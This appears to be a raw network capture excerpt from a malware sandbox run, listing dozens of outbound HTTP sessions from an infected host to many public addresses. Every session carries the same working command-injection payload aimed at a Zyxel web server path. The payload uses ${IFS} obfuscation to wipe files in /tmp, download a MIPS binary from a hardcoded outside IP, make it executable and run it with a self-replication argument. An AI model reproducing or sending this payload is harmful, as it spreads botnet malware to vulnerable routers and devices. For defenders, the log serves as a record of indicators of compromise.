                                                        Jan 28, 2024 10:12:46.290405989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2879192.168.2.1435958107.105.40.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290448904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2880192.168.2.145868838.206.118.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290483952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2881192.168.2.1442948168.65.56.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290518999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2882192.168.2.1439738216.139.61.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290549994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2883192.168.2.14400142.115.107.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290597916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2884192.168.2.144343274.117.234.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290621996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2885192.168.2.1454382200.130.216.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290677071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2886192.168.2.1456896200.110.228.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290714979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2887192.168.2.1448142159.162.77.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290740967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2888192.168.2.1456456190.226.43.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290783882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2889192.168.2.1443040101.77.228.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290829897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2890192.168.2.1437106165.131.13.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290864944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2891192.168.2.1447464160.245.76.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290904045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2892192.168.2.145035088.131.87.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290978909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2893192.168.2.14372988.217.36.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291007996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2894192.168.2.1433514150.90.133.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291040897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2895192.168.2.143293841.9.183.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291063070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2896192.168.2.1456772211.205.56.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291120052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2897192.168.2.145933819.96.29.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291145086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2898192.168.2.143984635.15.232.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291198015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2899192.168.2.1453432101.120.81.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291227102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2900192.168.2.144137041.77.52.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291270018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2901192.168.2.1460078149.135.98.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291306973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2902192.168.2.1445980187.207.8.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291363955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2903192.168.2.1449414144.85.48.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291392088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2904192.168.2.143830896.239.217.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291477919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2905192.168.2.145998434.213.220.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291482925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2906192.168.2.1433784200.78.169.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291541100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2907192.168.2.146072636.6.157.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291584015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2908192.168.2.145239624.241.68.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291613102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2909192.168.2.145935431.105.104.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291636944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2910192.168.2.144396078.60.232.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291688919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2911192.168.2.1437490104.157.19.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291716099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2912192.168.2.1440190222.128.211.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291778088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2913192.168.2.144255897.61.243.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291812897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2914192.168.2.145921692.58.155.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291841984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2915192.168.2.1437038178.105.29.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291891098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2916192.168.2.1442632207.151.19.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291913986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2917192.168.2.1449604114.127.95.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.291976929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2918192.168.2.143763623.41.55.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292005062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2919192.168.2.143541880.122.30.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292052031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2920192.168.2.143959676.199.160.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292073011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2921192.168.2.144326073.60.1.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292131901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2922192.168.2.1453294109.140.70.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292174101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2923192.168.2.144281295.164.213.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292200089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2924192.168.2.144992289.231.201.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292243004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2925192.168.2.1453118204.17.240.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292290926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2926192.168.2.1447896119.89.149.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292303085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2927192.168.2.1459624152.218.35.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292352915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2928192.168.2.1438352174.52.203.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292399883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2929192.168.2.144284817.53.7.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292448044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2930192.168.2.1452914118.242.160.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292470932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2931192.168.2.1446616182.58.57.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292532921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2932192.168.2.14365462.188.169.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292591095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2933192.168.2.1457958190.5.62.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292608976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2934192.168.2.1440832103.227.232.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292640924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2935192.168.2.1441840173.221.237.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292659998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2936192.168.2.143913434.125.123.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292706966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2937192.168.2.1450482194.210.86.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292747974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2938192.168.2.1442670147.169.5.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292784929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2939192.168.2.1459814149.96.146.75443
                                                        TimestampBytes transferredDirectionData
